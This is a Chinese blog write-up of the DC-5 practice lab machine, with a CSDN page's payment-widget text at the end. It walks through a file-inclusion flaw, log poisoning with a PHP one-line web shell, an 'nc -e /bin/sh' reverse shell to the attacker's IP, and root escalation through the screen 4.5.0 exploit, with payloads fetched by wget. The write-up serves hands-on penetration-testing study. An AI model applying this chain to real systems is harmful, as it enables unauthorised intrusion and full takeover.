dc5靶机攻略

文章描述了一次渗透攻击过程中,利用thankyou页中的动态参数执行shell脚本,包括nginx错误配置文件的访问,一句话木马的尝试,以及通过find命令寻找高权限文件并提权的过程。作者还涉及到了文件编译和传输,最终目标是获取root权限。
摘要由CSDN通过智能技术生成

dc5

扫描

image-20231022203335494

image-20231022203415028

image-20231022204616780

渗透

在thankyou页中,可以发现日期随着刷新不断变化

image-20231022205225096

刚才目录爆破的时候有个footer页日期同样变化

image-20231022205321306

在thankyou页查看源码,发现标签部分即为footer,猜测此处为执行了什么脚本,可以利用

回到thank页,发现url中类似问号接参数,像文件包含

将问号后参数更改

http://10.4.7.148/thankyou.php?file=/etc/passwd

image-20231022205531535

发现可以执行

nginx的错误配置文件在/var/log/nginx/error.log

在url中写入一句话木马,貌似没有成功,使用bp抓包写入

<?php $var=shell_exec($_GET['cmd']);echo $var?>

image-20231022211303996

然后执行一句话木马

?file=/var/log/nginx/error.log&cmd=nc -e/bin/sh 10.4.7.138 12138

image-20231022211536338

连接成功

image-20231022211616424

提权

find / -perm -4000 2>/dev/null

使用find找一下高权文件

此处发现screen 4.5.0

image-20231022212015334

kali中搜索一下

image-20231022212113118

下载41154.sh到本地

如图该执行文件分为三部分,需要将其单独拿出来编译

image-20231022212545928

编译语句脚本中有写,但是需要改一下文件路径,我就是都放在了root下

image-20231022213000647

因此我的编译语句即为

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c

image-20231022213150725

随后使用kali开启http服务,将这三个文件传到靶机的/tmp目录下

靶机中使用wget获取

wget http://10.4.7.138:6789/libhax.so
wget http://10.4.7.138:6789/rootshell
wget http://10.4.7.138:6789/use.sh

image-20231022213515278

此处我失败了,然后我全都放到centos7编译一遍,并且修改了一下use.sh

image-20231022214640455

如此保存后退出才行

随后再次重复操作执行,获取root权限

image-20231022215151943

flag仍然是在/root下

如此保存后退出才行

随后再次重复操作执行,获取root权限

flag仍然是在/root下

image-20231022215214606

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值